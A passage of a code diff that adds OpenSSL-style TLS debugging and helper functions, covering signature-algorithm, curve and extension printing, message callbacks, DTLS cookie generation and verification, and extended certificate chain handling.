+    BIO_puts(bio, "Client Certificate Types: ");
+    for (i = 0; i < cert_type_num; i++) {
+        unsigned char cert_type = p[i];
+        char *cname;
+        switch (cert_type) {
+        case TLS_CT_RSA_SIGN:
+            cname = "RSA sign";
+            break;
+
+        case TLS_CT_DSS_SIGN:
+            cname = "DSA sign";
+            break;
+
+        case TLS_CT_RSA_FIXED_DH:
+            cname = "RSA fixed DH";
+            break;
+
+        case TLS_CT_DSS_FIXED_DH:
+            cname = "DSS fixed DH";
+            break;
+
+        case TLS_CT_ECDSA_SIGN:
+            cname = "ECDSA sign";
+            break;
+
+        case TLS_CT_RSA_FIXED_ECDH:
+            cname = "RSA fixed ECDH";
+            break;
+
+        case TLS_CT_ECDSA_FIXED_ECDH:
+            cname = "ECDSA fixed ECDH";
+            break;
+
+        case TLS_CT_GOST94_SIGN:
+            cname = "GOST94 Sign";
+            break;
+
+        case TLS_CT_GOST01_SIGN:
+            cname = "GOST01 Sign";
+            break;
+
+        default:
+            cname = NULL;
+        }
+
+        if (i)
+            BIO_puts(bio, ", ");
+
+        if (cname)
+            BIO_puts(bio, cname);
+        else
+            BIO_printf(bio, "UNKNOWN (%d),", cert_type);
+    }
+    BIO_puts(bio, "\n");
+}
+
+static int do_print_sigalgs(BIO *out, SSL *s, int shared)
+{
+    int i, nsig, client;
+    client = SSL_is_server(s) ? 0 : 1;
+    if (shared)
+        nsig = SSL_get_shared_sigalgs(s, -1, NULL, NULL, NULL, NULL, NULL);
+    else
+        nsig = SSL_get_sigalgs(s, -1, NULL, NULL, NULL, NULL, NULL);
+    if (nsig == 0)
+        return 1;
+
+    if (shared)
+        BIO_puts(out, "Shared ");
+
+    if (client)
+        BIO_puts(out, "Requested ");
+    BIO_puts(out, "Signature Algorithms: ");
+    for (i = 0; i < nsig; i++) {
+        int hash_nid, sign_nid;
+        unsigned char rhash, rsign;
+        const char *sstr = NULL;
+        if (shared)
+            SSL_get_shared_sigalgs(s, i, &sign_nid, &hash_nid, NULL,
+                                   &rsign, &rhash);
+        else
+            SSL_get_sigalgs(s, i, &sign_nid, &hash_nid, NULL, &rsign, &rhash);
+        if (i)
+            BIO_puts(out, ":");
+        if (sign_nid == EVP_PKEY_RSA)
+            sstr = "RSA";
+        else if (sign_nid == EVP_PKEY_DSA)
+            sstr = "DSA";
+        else if (sign_nid == EVP_PKEY_EC)
+            sstr = "ECDSA";
+        if (sstr)
+            BIO_printf(out, "%s+", sstr);
+        else
+            BIO_printf(out, "0x%02X+", (int)rsign);
+        if (hash_nid != NID_undef)
+            BIO_printf(out, "%s", OBJ_nid2sn(hash_nid));
+        else
+            BIO_printf(out, "0x%02X", (int)rhash);
+    }
+    BIO_puts(out, "\n");
+    return 1;
+}
+
+int ssl_print_sigalgs(BIO *out, SSL *s)
+{
+    int mdnid;
+    if (!SSL_is_server(s))
+        ssl_print_client_cert_types(out, s);
+    do_print_sigalgs(out, s, 0);
+    do_print_sigalgs(out, s, 1);
+    if (SSL_get_peer_signature_nid(s, &mdnid))
+        BIO_printf(out, "Peer signing digest: %s\n", OBJ_nid2sn(mdnid));
+    return 1;
+}
+
+#ifndef OPENSSL_NO_EC
+int ssl_print_point_formats(BIO *out, SSL *s)
+{
+    int i, nformats;
+    const char *pformats;
+    nformats = SSL_get0_ec_point_formats(s, &pformats);
+    if (nformats <= 0)
+        return 1;
+    BIO_puts(out, "Supported Elliptic Curve Point Formats: ");
+    for (i = 0; i < nformats; i++, pformats++) {
+        if (i)
+            BIO_puts(out, ":");
+        switch (*pformats) {
+        case TLSEXT_ECPOINTFORMAT_uncompressed:
+            BIO_puts(out, "uncompressed");
+            break;
+
+        case TLSEXT_ECPOINTFORMAT_ansiX962_compressed_prime:
+            BIO_puts(out, "ansiX962_compressed_prime");
+            break;
+
+        case TLSEXT_ECPOINTFORMAT_ansiX962_compressed_char2:
+            BIO_puts(out, "ansiX962_compressed_char2");
+            break;
+
+        default:
+            BIO_printf(out, "unknown(%d)", (int)*pformats);
+            break;
+
+        }
+    }
+    if (nformats <= 0)
+        BIO_puts(out, "NONE");
+    BIO_puts(out, "\n");
+    return 1;
+}
+
+int ssl_print_curves(BIO *out, SSL *s, int noshared)
+{
+    int i, ncurves, *curves, nid;
+    const char *cname;
+    ncurves = SSL_get1_curves(s, NULL);
+    if (ncurves <= 0)
+        return 1;
+    curves = OPENSSL_malloc(ncurves * sizeof(int));
+    SSL_get1_curves(s, curves);
+
+    BIO_puts(out, "Supported Elliptic Curves: ");
+    for (i = 0; i < ncurves; i++) {
+        if (i)
+            BIO_puts(out, ":");
+        nid = curves[i];
+        /* If unrecognised print out hex version */
+        if (nid & TLSEXT_nid_unknown)
+            BIO_printf(out, "0x%04X", nid & 0xFFFF);
+        else {
+            /* Use NIST name for curve if it exists */
+            cname = EC_curve_nid2nist(nid);
+            if (!cname)
+                cname = OBJ_nid2sn(nid);
+            BIO_printf(out, "%s", cname);
+        }
+    }
+    if (ncurves == 0)
+        BIO_puts(out, "NONE");
+    OPENSSL_free(curves);
+    if (noshared) {
+        BIO_puts(out, "\n");
+        return 1;
+    }
+    BIO_puts(out, "\nShared Elliptic curves: ");
+    ncurves = SSL_get_shared_curve(s, -1);
+    for (i = 0; i < ncurves; i++) {
+        if (i)
+            BIO_puts(out, ":");
+        nid = SSL_get_shared_curve(s, i);
+        cname = EC_curve_nid2nist(nid);
+        if (!cname)
+            cname = OBJ_nid2sn(nid);
+        BIO_printf(out, "%s", cname);
+    }
+    if (ncurves == 0)
+        BIO_puts(out, "NONE");
+    BIO_puts(out, "\n");
+    return 1;
+}
+#endif
+int ssl_print_tmp_key(BIO *out, SSL *s)
+{
+    EVP_PKEY *key;
+    if (!SSL_get_server_tmp_key(s, &key))
+        return 1;
+    BIO_puts(out, "Server Temp Key: ");
+    switch (EVP_PKEY_id(key)) {
+    case EVP_PKEY_RSA:
+        BIO_printf(out, "RSA, %d bits\n", EVP_PKEY_bits(key));
+        break;
+
+    case EVP_PKEY_DH:
+        BIO_printf(out, "DH, %d bits\n", EVP_PKEY_bits(key));
+        break;
+#ifndef OPENSSL_NO_ECDH
+    case EVP_PKEY_EC:
+        {
+            EC_KEY *ec = EVP_PKEY_get1_EC_KEY(key);
+            int nid;
+            const char *cname;
+            nid = EC_GROUP_get_curve_name(EC_KEY_get0_group(ec));
+            EC_KEY_free(ec);
+            cname = EC_curve_nid2nist(nid);
+            if (!cname)
+                cname = OBJ_nid2sn(nid);
+            BIO_printf(out, "ECDH, %s, %d bits\n", cname, EVP_PKEY_bits(key));
+        }
+#endif
+    }
+    EVP_PKEY_free(key);
+    return 1;
+}
+
+long MS_CALLBACK bio_dump_callback(BIO *bio, int cmd, const char *argp,
+                                   int argi, long argl, long ret)
+{
+    BIO *out;
+
+    out = (BIO *)BIO_get_callback_arg(bio);
+    if (out == NULL)
+        return (ret);
+
+    if (cmd == (BIO_CB_READ | BIO_CB_RETURN)) {
+        BIO_printf(out, "read from %p [%p] (%lu bytes => %ld (0x%lX))\n",
+                   (void *)bio, argp, (unsigned long)argi, ret, ret);
+        BIO_dump(out, argp, (int)ret);
+        return (ret);
+    } else if (cmd == (BIO_CB_WRITE | BIO_CB_RETURN)) {
+        BIO_printf(out, "write to %p [%p] (%lu bytes => %ld (0x%lX))\n",
+                   (void *)bio, argp, (unsigned long)argi, ret, ret);
+        BIO_dump(out, argp, (int)ret);
+    }
+    return (ret);
+}
+
+void MS_CALLBACK apps_ssl_info_callback(const SSL *s, int where, int ret)
+{
+    const char *str;
+    int w;
+
+    w = where & ~SSL_ST_MASK;
+
+    if (w & SSL_ST_CONNECT)
+        str = "SSL_connect";
+    else if (w & SSL_ST_ACCEPT)
+        str = "SSL_accept";
+    else
+        str = "undefined";
+
+    if (where & SSL_CB_LOOP) {
+        BIO_printf(bio_err, "%s:%s\n", str, SSL_state_string_long(s));
+    } else if (where & SSL_CB_ALERT) {
+        str = (where & SSL_CB_READ) ? "read" : "write";
+        BIO_printf(bio_err, "SSL3 alert %s:%s:%s\n",
+                   str,
+                   SSL_alert_type_string_long(ret),
+                   SSL_alert_desc_string_long(ret));
+    } else if (where & SSL_CB_EXIT) {
+        if (ret == 0)
+            BIO_printf(bio_err, "%s:failed in %s\n",
+                       str, SSL_state_string_long(s));
+        else if (ret < 0) {
+            BIO_printf(bio_err, "%s:error in %s\n",
+                       str, SSL_state_string_long(s));
+        }
+    }
+}
+
+void MS_CALLBACK msg_cb(int write_p, int version, int content_type,
+                        const void *buf, size_t len, SSL *ssl, void *arg)
+{
+    BIO *bio = arg;
+    const char *str_write_p, *str_version, *str_content_type =
+        "", *str_details1 = "", *str_details2 = "";
+
+    str_write_p = write_p ? ">>>" : "<<<";
+
+    switch (version) {
+    case SSL2_VERSION:
+        str_version = "SSL 2.0";
+        break;
+    case SSL3_VERSION:
+        str_version = "SSL 3.0 ";
+        break;
+    case TLS1_VERSION:
+        str_version = "TLS 1.0 ";
+        break;
+    case TLS1_1_VERSION:
+        str_version = "TLS 1.1 ";
+        break;
+    case TLS1_2_VERSION:
+        str_version = "TLS 1.2 ";
+        break;
+    case DTLS1_VERSION:
+        str_version = "DTLS 1.0 ";
+        break;
+    case DTLS1_BAD_VER:
+        str_version = "DTLS 1.0 (bad) ";
+        break;
+    default:
+        str_version = "???";
+    }
+
+    if (version == SSL2_VERSION) {
+        str_details1 = "???";
+
+        if (len > 0) {
+            switch (((const unsigned char *)buf)[0]) {
+            case 0:
+                str_details1 = ", ERROR:";
+                str_details2 = " ???";
+                if (len >= 3) {
+                    unsigned err =
+                        (((const unsigned char *)buf)[1] << 8) +
+                        ((const unsigned char *)buf)[2];
+
+                    switch (err) {
+                    case 0x0001:
+                        str_details2 = " NO-CIPHER-ERROR";
+                        break;
+                    case 0x0002:
+                        str_details2 = " NO-CERTIFICATE-ERROR";
+                        break;
+                    case 0x0004:
+                        str_details2 = " BAD-CERTIFICATE-ERROR";
+                        break;
+                    case 0x0006:
+                        str_details2 = " UNSUPPORTED-CERTIFICATE-TYPE-ERROR";
+                        break;
+                    }
+                }
+
+                break;
+            case 1:
+                str_details1 = ", CLIENT-HELLO";
+                break;
+            case 2:
+                str_details1 = ", CLIENT-MASTER-KEY";
+                break;
+            case 3:
+                str_details1 = ", CLIENT-FINISHED";
+                break;
+            case 4:
+                str_details1 = ", SERVER-HELLO";
+                break;
+            case 5:
+                str_details1 = ", SERVER-VERIFY";
+                break;
+            case 6:
+                str_details1 = ", SERVER-FINISHED";
+                break;
+            case 7:
+                str_details1 = ", REQUEST-CERTIFICATE";
+                break;
+            case 8:
+                str_details1 = ", CLIENT-CERTIFICATE";
+                break;
+            }
+        }
+    }
+
+    if (version == SSL3_VERSION ||
+        version == TLS1_VERSION ||
+        version == TLS1_1_VERSION ||
+        version == TLS1_2_VERSION ||
+        version == DTLS1_VERSION || version == DTLS1_BAD_VER) {
+        switch (content_type) {
+        case 20:
+            str_content_type = "ChangeCipherSpec";
+            break;
+        case 21:
+            str_content_type = "Alert";
+            break;
+        case 22:
+            str_content_type = "Handshake";
+            break;
+        }
+
+        if (content_type == 21) { /* Alert */
+            str_details1 = ", ???";
+
+            if (len == 2) {
+                switch (((const unsigned char *)buf)[0]) {
+                case 1:
+                    str_details1 = ", warning";
+                    break;
+                case 2:
+                    str_details1 = ", fatal";
+                    break;
+                }
+
+                str_details2 = " ???";
+                switch (((const unsigned char *)buf)[1]) {
+                case 0:
+                    str_details2 = " close_notify";
+                    break;
+                case 10:
+                    str_details2 = " unexpected_message";
+                    break;
+                case 20:
+                    str_details2 = " bad_record_mac";
+                    break;
+                case 21:
+                    str_details2 = " decryption_failed";
+                    break;
+                case 22:
+                    str_details2 = " record_overflow";
+                    break;
+                case 30:
+                    str_details2 = " decompression_failure";
+                    break;
+                case 40:
+                    str_details2 = " handshake_failure";
+                    break;
+                case 42:
+                    str_details2 = " bad_certificate";
+                    break;
+                case 43:
+                    str_details2 = " unsupported_certificate";
+                    break;
+                case 44:
+                    str_details2 = " certificate_revoked";
+                    break;
+                case 45:
+                    str_details2 = " certificate_expired";
+                    break;
+                case 46:
+                    str_details2 = " certificate_unknown";
+                    break;
+                case 47:
+                    str_details2 = " illegal_parameter";
+                    break;
+                case 48:
+                    str_details2 = " unknown_ca";
+                    break;
+                case 49:
+                    str_details2 = " access_denied";
+                    break;
+                case 50:
+                    str_details2 = " decode_error";
+                    break;
+                case 51:
+                    str_details2 = " decrypt_error";
+                    break;
+                case 60:
+                    str_details2 = " export_restriction";
+                    break;
+                case 70:
+                    str_details2 = " protocol_version";
+                    break;
+                case 71:
+                    str_details2 = " insufficient_security";
+                    break;
+                case 80:
+                    str_details2 = " internal_error";
+                    break;
+                case 90:
+                    str_details2 = " user_canceled";
+                    break;
+                case 100:
+                    str_details2 = " no_renegotiation";
+                    break;
+                case 110:
+                    str_details2 = " unsupported_extension";
+                    break;
+                case 111:
+                    str_details2 = " certificate_unobtainable";
+                    break;
+                case 112:
+                    str_details2 = " unrecognized_name";
+                    break;
+                case 113:
+                    str_details2 = " bad_certificate_status_response";
+                    break;
+                case 114:
+                    str_details2 = " bad_certificate_hash_value";
+                    break;
+                case 115:
+                    str_details2 = " unknown_psk_identity";
+                    break;
+                }
+            }
+        }
+
+        if (content_type == 22) { /* Handshake */
+            str_details1 = "???";
+
+            if (len > 0) {
+                switch (((const unsigned char *)buf)[0]) {
+                case 0:
+                    str_details1 = ", HelloRequest";
+                    break;
+                case 1:
+                    str_details1 = ", ClientHello";
+                    break;
+                case 2:
+                    str_details1 = ", ServerHello";
+                    break;
+                case 3:
+                    str_details1 = ", HelloVerifyRequest";
+                    break;
+                case 11:
+                    str_details1 = ", Certificate";
+                    break;
+                case 12:
+                    str_details1 = ", ServerKeyExchange";
+                    break;
+                case 13:
+                    str_details1 = ", CertificateRequest";
+                    break;
+                case 14:
+                    str_details1 = ", ServerHelloDone";
+                    break;
+                case 15:
+                    str_details1 = ", CertificateVerify";
+                    break;
+                case 16:
+                    str_details1 = ", ClientKeyExchange";
+                    break;
+                case 20:
+                    str_details1 = ", Finished";
+                    break;
+                }
+            }
+        }
+#ifndef OPENSSL_NO_HEARTBEATS
+        if (content_type == 24) { /* Heartbeat */
+            str_details1 = ", Heartbeat";
+
+            if (len > 0) {
+                switch (((const unsigned char *)buf)[0]) {
+                case 1:
+                    str_details1 = ", HeartbeatRequest";
+                    break;
+                case 2:
+                    str_details1 = ", HeartbeatResponse";
+                    break;
+                }
+            }
+        }
+#endif
+    }
+
+    BIO_printf(bio, "%s %s%s [length %04lx]%s%s\n", str_write_p, str_version,
+               str_content_type, (unsigned long)len, str_details1,
+               str_details2);
+
+    if (len > 0) {
+        size_t num, i;
+
+        BIO_printf(bio, "   ");
+        num = len;
+#if 0
+        if (num > 16)
+            num = 16;
+#endif
+        for (i = 0; i < num; i++) {
+            if (i % 16 == 0 && i > 0)
+                BIO_printf(bio, "\n   ");
+            BIO_printf(bio, " %02x", ((const unsigned char *)buf)[i]);
+        }
+        if (i < len)
+            BIO_printf(bio, " ...");
+        BIO_printf(bio, "\n");
+    }
+    (void)BIO_flush(bio);
+}
+
+void MS_CALLBACK tlsext_cb(SSL *s, int client_server, int type,
+                           unsigned char *data, int len, void *arg)
+{
+    BIO *bio = arg;
+    char *extname;
+
+    switch (type) {
+    case TLSEXT_TYPE_server_name:
+        extname = "server name";
+        break;
+
+    case TLSEXT_TYPE_max_fragment_length:
+        extname = "max fragment length";
+        break;
+
+    case TLSEXT_TYPE_client_certificate_url:
+        extname = "client certificate URL";
+        break;
+
+    case TLSEXT_TYPE_trusted_ca_keys:
+        extname = "trusted CA keys";
+        break;
+
+    case TLSEXT_TYPE_truncated_hmac:
+        extname = "truncated HMAC";
+        break;
+
+    case TLSEXT_TYPE_status_request:
+        extname = "status request";
+        break;
+
+    case TLSEXT_TYPE_user_mapping:
+        extname = "user mapping";
+        break;
+
+    case TLSEXT_TYPE_client_authz:
+        extname = "client authz";
+        break;
+
+    case TLSEXT_TYPE_server_authz:
+        extname = "server authz";
+        break;
+
+    case TLSEXT_TYPE_cert_type:
+        extname = "cert type";
+        break;
+
+    case TLSEXT_TYPE_elliptic_curves:
+        extname = "elliptic curves";
+        break;
+
+    case TLSEXT_TYPE_ec_point_formats:
+        extname = "EC point formats";
+        break;
+
+    case TLSEXT_TYPE_srp:
+        extname = "SRP";
+        break;
+
+    case TLSEXT_TYPE_signature_algorithms:
+        extname = "signature algorithms";
+        break;
+
+    case TLSEXT_TYPE_use_srtp:
+        extname = "use SRTP";
+        break;
+
+    case TLSEXT_TYPE_heartbeat:
+        extname = "heartbeat";
+        break;
+
+    case TLSEXT_TYPE_session_ticket:
+        extname = "session ticket";
+        break;
+
+    case TLSEXT_TYPE_renegotiate:
+        extname = "renegotiation info";
+        break;
+
+#ifdef TLSEXT_TYPE_opaque_prf_input
+    case TLSEXT_TYPE_opaque_prf_input:
+        extname = "opaque PRF input";
+        break;
+#endif
+#ifdef TLSEXT_TYPE_next_proto_neg
+    case TLSEXT_TYPE_next_proto_neg:
+        extname = "next protocol";
+        break;
+#endif
+
+    case TLSEXT_TYPE_padding:
+        extname = "TLS padding";
+        break;
+
+    default:
+        extname = "unknown";
+        break;
+
+    }
+
+    BIO_printf(bio, "TLS %s extension \"%s\" (id=%d), len=%d\n",
+               client_server ? "server" : "client", extname, type, len);
+    BIO_dump(bio, (char *)data, len);
+    (void)BIO_flush(bio);
+}
+
+int MS_CALLBACK generate_cookie_callback(SSL *ssl, unsigned char *cookie,
+                                         unsigned int *cookie_len)
+{
+    unsigned char *buffer, result[EVP_MAX_MD_SIZE];
+    unsigned int length, resultlength;
+    union {
+        struct sockaddr sa;
+        struct sockaddr_in s4;
+#if OPENSSL_USE_IPV6
+        struct sockaddr_in6 s6;
+#endif
+    } peer;
+
+    /* Initialize a random secret */
+    if (!cookie_initialized) {
+        if (!RAND_bytes(cookie_secret, COOKIE_SECRET_LENGTH)) {
+            BIO_printf(bio_err, "error setting random cookie secret\n");
+            return 0;
+        }
+        cookie_initialized = 1;
+    }
+
+    /* Read peer information */
+    (void)BIO_dgram_get_peer(SSL_get_rbio(ssl), &peer);
+
+    /* Create buffer with peer's address and port */
+    length = 0;
+    switch (peer.sa.sa_family) {
+    case AF_INET:
+        length += sizeof(struct in_addr);
+        length += sizeof(peer.s4.sin_port);
+        break;
+#if OPENSSL_USE_IPV6
+    case AF_INET6:
+        length += sizeof(struct in6_addr);
+        length += sizeof(peer.s6.sin6_port);
+        break;
+#endif
+    default:
+        OPENSSL_assert(0);
+        break;
+    }
+    buffer = OPENSSL_malloc(length);
+
+    if (buffer == NULL) {
+        BIO_printf(bio_err, "out of memory\n");
+        return 0;
+    }
+
+    switch (peer.sa.sa_family) {
+    case AF_INET:
+        memcpy(buffer, &peer.s4.sin_port, sizeof(peer.s4.sin_port));
+        memcpy(buffer + sizeof(peer.s4.sin_port),
+               &peer.s4.sin_addr, sizeof(struct in_addr));
+        break;
+#if OPENSSL_USE_IPV6
+    case AF_INET6:
+        memcpy(buffer, &peer.s6.sin6_port, sizeof(peer.s6.sin6_port));
+        memcpy(buffer + sizeof(peer.s6.sin6_port),
+               &peer.s6.sin6_addr, sizeof(struct in6_addr));
+        break;
+#endif
+    default:
+        OPENSSL_assert(0);
+        break;
+    }
+
+    /* Calculate HMAC of buffer using the secret */
+    HMAC(EVP_sha1(), cookie_secret, COOKIE_SECRET_LENGTH,
+         buffer, length, result, &resultlength);
+    OPENSSL_free(buffer);
+
+    memcpy(cookie, result, resultlength);
+    *cookie_len = resultlength;
+
+    return 1;
+}
+
+int MS_CALLBACK verify_cookie_callback(SSL *ssl, unsigned char *cookie,
+                                       unsigned int cookie_len)
+{
+    unsigned char *buffer, result[EVP_MAX_MD_SIZE];
+    unsigned int length, resultlength;
+    union {
+        struct sockaddr sa;
+        struct sockaddr_in s4;
+#if OPENSSL_USE_IPV6
+        struct sockaddr_in6 s6;
+#endif
+    } peer;
+
+    /* If secret isn't initialized yet, the cookie can't be valid */
+    if (!cookie_initialized)
+        return 0;
+
+    /* Read peer information */
+    (void)BIO_dgram_get_peer(SSL_get_rbio(ssl), &peer);
+
+    /* Create buffer with peer's address and port */
+    length = 0;
+    switch (peer.sa.sa_family) {
+    case AF_INET:
+        length += sizeof(struct in_addr);
+        length += sizeof(peer.s4.sin_port);
+        break;
+#if OPENSSL_USE_IPV6
+    case AF_INET6:
+        length += sizeof(struct in6_addr);
+        length += sizeof(peer.s6.sin6_port);
+        break;
+#endif
+    default:
+        OPENSSL_assert(0);
+        break;
+    }
+    buffer = OPENSSL_malloc(length);
+
+    if (buffer == NULL) {
+        BIO_printf(bio_err, "out of memory\n");
+        return 0;
+    }
+
+    switch (peer.sa.sa_family) {
+    case AF_INET:
+        memcpy(buffer, &peer.s4.sin_port, sizeof(peer.s4.sin_port));
+        memcpy(buffer + sizeof(peer.s4.sin_port),
+               &peer.s4.sin_addr, sizeof(struct in_addr));
+        break;
+#if OPENSSL_USE_IPV6
+    case AF_INET6:
+        memcpy(buffer, &peer.s6.sin6_port, sizeof(peer.s6.sin6_port));
+        memcpy(buffer + sizeof(peer.s6.sin6_port),
+               &peer.s6.sin6_addr, sizeof(struct in6_addr));
+        break;
+#endif
+    default:
+        OPENSSL_assert(0);
+        break;
+    }
+
+    /* Calculate HMAC of buffer using the secret */
+    HMAC(EVP_sha1(), cookie_secret, COOKIE_SECRET_LENGTH,
+         buffer, length, result, &resultlength);
+    OPENSSL_free(buffer);
+
+    if (cookie_len == resultlength
+        && memcmp(result, cookie, resultlength) == 0)
+        return 1;
+
+    return 0;
+}
+
+/*
+ * Example of extended certificate handling. Where the standard support of
+ * one certificate per algorithm is not sufficient an application can decide
+ * which certificate(s) to use at runtime based on whatever criteria it deems
+ * appropriate.
+ */
+
+/* Linked list of certificates, keys and chains */
+struct ssl_excert_st {
+    int certform;
+    const char *certfile;
+    int keyform;
+    const char *keyfile;
+    const char *chainfile;
+    X509 *cert;
+    EVP_PKEY *key;
+    STACK_OF(X509) *chain;
+    int build_chain;
+    struct ssl_excert_st *next, *prev;
+};
+
+struct chain_flags {
+    int flag;
+    const char *name;
+};
+
+struct chain_flags chain_flags_list[] = {
+    {CERT_PKEY_VALID, "Overall Validity"},
+    {CERT_PKEY_SIGN, "Sign with EE key"},
+    {CERT_PKEY_EE_SIGNATURE, "EE signature"},
+    {CERT_PKEY_CA_SIGNATURE, "CA signature"},
+    {CERT_PKEY_EE_PARAM, "EE key parameters"},
+    {CERT_PKEY_CA_PARAM, "CA key parameters"},
+    {CERT_PKEY_EXPLICIT_SIGN, "Explicity sign with EE key"},
+    {CERT_PKEY_ISSUER_NAME, "Issuer Name"},
+    {CERT_PKEY_CERT_TYPE, "Certificate Type"},
+    {0, NULL}
+};
+
+static void print_chain_flags(BIO *out, SSL *s, int flags)
+{
+    struct chain_flags *ctmp = chain_flags_list;
+    while (ctmp->name) {
+        BIO_printf(out, "\t%s: %s\n", ctmp->name,
+                   flags & ctmp->flag ? "OK" : "NOT OK");
+        ctmp++;
+    }
+    BIO_printf(out, "\tSuite B: ");
+    if (SSL_set_cert_flags(s, 0) & SSL_CERT_FLAG_SUITEB_128_LOS)
+        BIO_puts(out, flags & CERT_PKEY_SUITEB ? "OK\n" : "NOT OK\n");
+    else
+        BIO_printf(out, "not tested\n");
+}
+
+/*
+ * Very basic selection callback: just use any certificate chain reported as
+ * valid. More sophisticated could prioritise according to local policy.
+ */
+static int set_cert_cb(SSL *ssl, void *arg)
+{
+    int i, rv;
+    SSL_EXCERT *exc = arg;
+#ifdef CERT_CB_TEST_RETRY
+    static int retry_cnt;
+    if (retry_cnt < 5) {
+        retry_cnt++;
+        fprintf(stderr, "Certificate callback retry test: count %d\n",
+                retry_cnt);
+        return -1;
+    }
+#endif
+    SSL_certs_clear(ssl);
+
+    if (!exc)
+        return 1;
+
+    /*
+     * Go to end of list and traverse backwards since we prepend newer
+     * entries this retains the original order.
+     */
+    while (exc->next)
+        exc = exc->next;
+
+    i = 0;
+
+    while (exc) {
+        i++;
+        rv = SSL_check_chain(ssl, exc->cert, exc->key, exc->chain);
+        BIO_printf(bio_err, "Checking cert chain %d:\nSubject: ", i);
+        X509_NAME_print_ex(bio_err, X509_get_subject_name(exc->cert), 0,
+                           XN_FLAG_ONELINE);
+        BIO_puts(bio_err, "\n");
+
+        print_chain_flags(bio_err, ssl, rv);
+        if (rv & CERT_PKEY_VALID) {
+            SSL_use_certificate(ssl, exc->cert);
+            SSL_use_PrivateKey(ssl, exc->key);
+            /*
+             * NB: we wouldn't normally do this as it is not efficient
+             * building chains on each connection better to cache the chain
+             * in advance.
+             */
+            if (exc->build_chain) {
+                if (!SSL_build_cert_chain(ssl, 0))
+                    return 0;
+            } else if (exc->chain)
+                SSL_set1_chain(ssl, exc->chain);
+        }
+        exc = exc->prev;
+    }
+    return 1;
+}
+
+void ssl_ctx_set_excert(SSL_CTX *ctx, SSL_EXCERT *exc)
+{
+    SSL_CTX_set_cert_cb(ctx, set_cert_cb, exc);
+}
+
+static int ssl_excert_prepend(SSL_EXCERT **pexc)
+{
+    SSL_EXCERT *exc;
+    exc = OPENSSL_malloc(sizeof(SSL_EXCERT));
+    if (!exc)
+        return 0;
+    exc->certfile = NULL;
+    exc->keyfile = NULL;
+    exc->chainfile = NULL;
+    exc->cert = NULL;
+    exc->key = NULL;
+    exc->chain = NULL;
+    exc->prev = NULL;
+    exc->build_chain = 0;
+
+    exc->next = *pexc;
+    *pexc = exc;
+
+    if (exc->next) {
+        exc->certform = exc->next->certform;
+        exc->keyform = exc->next->keyform;
+        exc->next->prev = exc;
+    } else {
+        exc->certform = FORMAT_PEM;
+        exc->keyform = FORMAT_PEM;
+    }
+    return 1;
+
+}
+
+void ssl_excert_free(SSL_EXCERT *exc)
+{
+    SSL_EXCERT *curr;
+    while (exc) {
+        if (exc->cert)
+            X509_free(exc->cert);
+        if (exc->key)
+            EVP_PKEY_free(exc->key);
+        if (exc->chain)
+            sk_X509_pop_free(exc->chain, X509_free);
+        curr = exc;
+        exc = exc->next;
+        OPENSSL_free(curr);
+    }
+}
+
+int load_excert(SSL_EXCERT **pexc, BIO *err)
+{
+    SSL_EXCERT *exc = *pexc;
+    if (!exc)
+        return 1;
+    /* If nothing in list, free and set to NULL */
+    if (!exc->certfile && !exc->next) {
+        ssl_excert_free(exc);
+        *pexc = NULL;
+        return 1;
+    }
+    for (; exc; exc = exc->next) {
+        if (!exc->certfile) {
+            BIO_printf(err, "Missing filename\n");
+            return 0;
+        }
+        exc->cert = load_cert(err, exc->certfile, exc->certform,
+                              NULL, NULL, "Server Certificate");
+        if (!exc->cert)
+            return 0;
+        if (exc->keyfile) {
+            exc->key = load_key(err, exc->keyfile, exc->keyform,
+                                0, NULL, NULL, "Server Key");
+        } else {
+            exc->key = load_key(err, exc->certfile, exc->certform,
+                                0, NULL, NULL, "Server Key");
+        }
+        if (!exc->key)
+            return 0;
+        if (exc->chainfile) {
+            exc->chain = load_certs(err,
+                                    exc->chainfile, FORMAT_PEM,
+                                    NULL, NULL, "Server Chain");
+            if (!exc->chain)
+                return 0;
+        }
+    }
+    return 1;
+}
+
+int args_excert(char ***pargs, int *pargc,
+                int *badarg, BIO *err, SSL_EXCERT **pexc)
+{
+    char *arg = **pargs, *argn = (*pargs)[1];
+    SSL_EXCERT *exc = *pexc;
+    int narg = 2;
+    if (!exc) {
+        if (ssl_excert_prepend(&exc))
+            *pexc = exc;
+        else {
+            BIO_printf(err, "Error initialising xcert\n");
+            *badarg = 1;
+            goto err;
+        }
+    }
+    if (strcmp(arg, "-xcert") == 0) {
+        if (!argn) {
+            *badarg = 1;
+            return 1;
+        }
+        if (exc->certfile && !ssl_excert_prepend(&exc)) {
+            BIO_printf(err, "Error adding xcert\n");
+            *badarg = 1;
+            goto err;
+        }
+        exc->certfile = argn;
+    } else if (strcmp(arg, "-xkey") == 0) {
+        if (!argn) {
+            *badarg = 1;
+            return 1;
+        }
+        if (exc->keyfile) {
+            BIO_printf(err, "Key already specified\n");
+            *badarg = 1;
+            return 1;
+        }
+        exc->keyfile = argn;
+    } else if (strcmp(arg, "-xchain") == 0) {
+        if (!argn) {
+            *badarg = 1;
+            return 1;
+        }
+        if (exc->chainfile) {
+            BIO_printf(err, "Chain already specified\n");
+            *badarg = 1;
+            return 1;
+        }
+        exc->chainfile = argn;
+    } else if (strcmp(arg, "-xchain_build") == 0) {
+        narg = 1;
+        exc->build_chain = 1;
+    } else if (strcmp(arg, "-xcertform") == 0) {
+        if (!argn) {
+            *badarg = 1;
+            goto err;
+        }
+        exc->certform = str2fmt(argn);
+    } else if (strcmp(arg, "-xkeyform") == 0) {
+        if (!argn) {
+            *badarg = 1;
+            goto err;
+        }
+        exc->keyform = str2fmt(argn);
+    } else
+        return 0;
+
+    (*pargs) += narg;
+
+    if (pargc)
+        *pargc -= narg;
+
+    *pexc = exc;
+
+    return 1;
+
+ err:
+    ERR_print_errors(err);
+    ssl_excert_free(exc);
+    *pexc = NULL;
+    return 1;
+}
+
+static void print_raw_cipherlist(BIO *bio, SSL *s)
+{
+    const unsigned char *rlist;
+    static const unsigned char scsv_id[] = { 0, 0, 0xFF };
+    size_t i, rlistlen, num;
+    if (!SSL_is_server(s))
+        return;
+    num = SSL_get0_raw_cipherlist(s, NULL);
+    rlistlen = SSL_get0_raw_cipherlist(s, &rlist);
+    BIO_puts(bio, "Client cipher list: ");
+    for (i = 0; i < rlistlen; i += num, rlist += num) {
+        const SSL_CIPHER *c = SSL_CIPHER_find(s, rlist);
+        if (i)
+            BIO_puts(bio, ":");
+        if (c)
+            BIO_puts(bio, SSL_CIPHER_get_name(c));
